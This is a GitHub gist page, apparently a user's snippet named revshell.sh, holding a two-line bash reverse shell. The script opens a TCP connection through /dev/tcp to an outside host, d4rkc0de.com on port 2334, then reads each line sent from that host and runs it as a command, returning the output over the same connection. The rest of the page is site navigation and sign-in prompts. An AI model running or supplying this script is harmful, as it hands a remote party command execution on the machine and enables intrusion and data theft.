Skip to content

Instantly share code, notes, and snippets.

@lionaneesh
Created April 1, 2020 12:29
Show Gist options
  • Save lionaneesh/58d88fb38e530811f030f5c6a80a2bad to your computer and use it in GitHub Desktop.
Save lionaneesh/58d88fb38e530811f030f5c6a80a2bad to your computer and use it in GitHub Desktop.
revshell.sh
exec 5<>/dev/tcp/d4rkc0de.com/2334
cat <&5 | while read line; do $line 2>&5 >&5; done
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment